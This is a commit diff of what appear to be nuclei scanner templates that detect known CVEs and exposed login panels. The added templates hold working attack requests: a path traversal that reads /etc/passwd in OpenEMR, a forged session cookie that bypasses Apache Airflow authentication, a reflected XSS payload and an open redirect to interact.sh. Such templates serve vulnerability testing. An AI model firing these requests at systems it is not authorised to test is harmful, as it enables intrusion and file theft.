STRLCPY/scan4all

■ ■ ■ ■ ■ ■

.github/build/linux.yml

		skipped 15 lines
16	16		- linux
17	17		goarch:
18	18		- amd64
19		-	# - arm64
	19	+	- arm64
20	20		archives:
21	21		- format: zip
22	22
		skipped 3 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2008/CVE-2008-1061.yaml

		skipped 10 lines
11	11		- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
12	12		- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
13	13		- http://secunia.com/advisories/29099
	14	+	classification:
	15	+	cve-id: CVE-2008-1061
14	16		tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
15	17
16	18		requests:
		skipped 20 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2015/CVE-2015-4127.yaml

		skipped 10 lines
11	11		- https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
12	12		- https://nvd.nist.gov/vuln/detail/CVE-2015-4127
13	13		- https://wordpress.org/plugins/church-admin/changelog/
	14	+	classification:
	15	+	cve-id: CVE-2015-4127
14	16		tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
15	17
16	18		requests:
		skipped 20 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2017/CVE-2017-11586.yaml

1	+	id: CVE-2017-11586
2	+
3	+	info:
4	+	name: FineCms < 5.0.9 - Open redirect
5	+	author: 0x_Akoko
6	+	severity: medium
7	+	description: \|
8	+	dayrui FineCms 5.0.9 has URL Redirector Abuse via the url parameter in a sync action.
9	+	reference:
10	+	- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2017-11586
12	+	classification:
13	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
14	+	cvss-score: 6.1
15	+	cve-id: CVE-2017-11586
16	+	cwe-id: CWE-601
17	+	metadata:
18	+	verified: "true"
19	+	tags: cve,cve2017,redirect,finecms
20	+
21	+	requests:
22	+	- raw:
23	+	- \|
24	+	POST /index.php?s=member&c=login&m=index HTTP/1.1
25	+	Host: {{Hostname}}
26	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
27	+
28	+	back=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1
29	+
30	+	- \|
31	+	GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1
32	+	Host: {{Hostname}}
33	+
34	+	cookie-reuse: true
35	+	matchers:
36	+	- type: regex
37	+	part: header
38	+	regex:
39	+	- 'Refresh:(.*)url=http:\/\/interact\.sh'
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2017/CVE-2017-11629.yaml

		skipped 8 lines
9	9		reference:
10	10		- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
11	11		- https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
	12	+	- http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
12	13		classification:
	14	+	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
	15	+	cvss-score: 6.1
13	16		cve-id: CVE-2017-11629
	17	+	cwe-id: CWE-79
14	18		metadata:
15		-	verified: true
	19	+	verified: "true"
16	20		tags: cve,cve2017,xss,finecms
17	21
18	22		requests:
		skipped 20 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2019/CVE-2019-14530.yaml

1	+	id: CVE-2019-14530
2	+
3	+	info:
4	+	name: OpenEMR < 5.0.2 - Path Traversal
5	+	author: TenBird
6	+	severity: high
7	+	description: \|
8	+	An issue was discovered in custom/ajax_download.php in OpenEMR before 5.0.2 via the fileName parameter. An attacker can download any file (that is readable by the user www-data) from server storage. If the requested file is writable for the www-data user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, it will be deleted from server.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/50037
11	+	- https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2019-14530
13	+	- https://github.com/openemr/openemr/pull/2592
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
16	+	cvss-score: 8.8
17	+	cve-id: CVE-2019-14530
18	+	cwe-id: CWE-22
19	+	metadata:
20	+	verified: "true"
21	+	tags: lfi,authenticated,edb,cve,cve2019,openemr
22	+
23	+	requests:
24	+	- raw:
25	+	- \|
26	+	POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
27	+	Host: {{Hostname}}
28	+	Content-Type: application/x-www-form-urlencoded
29	+
30	+	new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1
31	+
32	+	- \|
33	+	GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
34	+	Host: {{Hostname}}
35	+
36	+	redirects: true
37	+	max-redirects: 2
38	+	cookie-reuse: true
39	+	matchers-condition: and
40	+	matchers:
41	+	- type: regex
42	+	regex:
43	+	- "root:[x*]:0:0"
44	+
45	+	- type: word
46	+	part: header
47	+	words:
48	+	- filename=passwd
49	+
50	+	- type: status
51	+	status:
52	+	- 200
53	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2020/CVE-2020-17526.yaml

1	+	id: CVE-2020-17526
2	+
3	+	info:
4	+	name: Apache Airflow < 1.10.14 - Authentication Bypass
5	+	author: piyushchhiroliya
6	+	severity: high
7	+	description: \|
8	+	Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
9	+	reference:
10	+	- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
12	+	- https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
13	+	- http://www.openwall.com/lists/oss-security/2020/12/21/1
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
16	+	cvss-score: 7.7
17	+	cve-id: CVE-2020-17526
18	+	metadata:
19	+	fofa-query: Apache Airflow
20	+	verified: "true"
21	+	tags: cve,cve2020,apache,airflow,auth-bypass
22	+
23	+	requests:
24	+	- raw:
25	+	- \|
26	+	GET /admin/ HTTP/1.1
27	+	Host: {{Hostname}}
28	+
29	+	- \|
30	+	GET /admin/ HTTP/1.1
31	+	Host: {{Hostname}}
32	+	Cookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
33	+
34	+	req-condition: true
35	+	matchers-condition: and
36	+	matchers:
37	+	- type: word
38	+	part: body_2
39	+	words:
40	+	- "DAG"
41	+	- "Recent Tasks"
42	+	- "Users"
43	+	- "SLA Misses"
44	+	- "Task Instances"
45	+	condition: and
46	+
47	+	- type: dsl
48	+	dsl:
49	+	- "contains(body_1, 'Redirecting...')"
50	+	- "status_code_1 == 302"
51	+	condition: and
52	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-2383.yaml

1	+	id: CVE-2022-2383
2	+
3	+	info:
4	+	name: Feed Them Social < 3.0.1 - Cross-Site Scripting
5	+	author: akincibor
6	+	severity: medium
7	+	description: \|
8	+	The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting.
9	+	reference:
10	+	- https://wpscan.com/vulnerability/4a3b3023-e740-411c-a77c-6477b80d7531
11	+	- https://wordpress.org/plugins/feed-them-social/
12	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2383
13	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-2383
14	+	classification:
15	+	cve-id: CVE-2022-2383
16	+	metadata:
17	+	verified: true
18	+	tags: wp,wordpress,wp-plugin,wpscan,cve,cve2022,xss
19	+
20	+	requests:
21	+	- method: GET
22	+	path:
23	+	- '{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E'
24	+
25	+	matchers-condition: and
26	+	matchers:
27	+	- type: word
28	+	part: body
29	+	words:
30	+	- '<img src onerror=alert(document.domain)><br/>'
31	+
32	+	- type: word
33	+	part: header
34	+	words:
35	+	- text/html
36	+
37	+	- type: status
38	+	status:
39	+	- 200
40	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/archibus-webcentral-panel.yaml

		skipped 1 lines
2	2
3	3		info:
4	4		name: Archibus Web Central Panel
5		-	author: righettod
	5	+	author: righettod,PJBorah,Hardik-Rathod
6	6		severity: info
7	7		reference:
8	8		- https://archibus.com/products/
		skipped 7 lines
16	16		path:
17	17		- '{{BaseURL}}'
18	18		- '{{BaseURL}}/archibus/login.axvw'
	19	+	- '{{BaseURL}}/archibus/schema/ab-core/views/sign-in/ab-sign-in.jsp'
19	20
20	21		redirects: true
21	22		max-redirects: 2
		skipped 6 lines
28	29
29	30		- type: word
30	31		words:
	32	+	- "Continue As a Guest"
31	33		- "login"
32		-	- "Sign Out"
33	34		condition: or
34	35
35	36		- type: status
		skipped 3 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/icc-pro-login.yaml

1	+	id: icc-pro-login
2	+
3	+	info:
4	+	name: ICC Pro System Login
5	+	author: DhiyaneshDk
6	+	severity: info
7	+	reference:
8	+	- https://www.exploit-db.com/ghdb/7980
9	+	metadata:
10	+	verified: true
11	+	shodan-query: title:"Login to ICC PRO system"
12	+	tags: panel,icc-pro,edb
13	+
14	+	requests:
15	+	- method: GET
16	+	path:
17	+	- "{{BaseURL}}/Account/Login"
18	+
19	+	matchers-condition: and
20	+	matchers:
21	+	- type: word
22	+	part: body
23	+	words:
24	+	- "<title>Login to ICC PRO system</title>"
25	+
26	+	- type: word
27	+	part: header
28	+	words:
29	+	- "text/html"
30	+
31	+	- type: status
32	+	status:
33	+	- 200
34	+

up PoCs 2022-08-31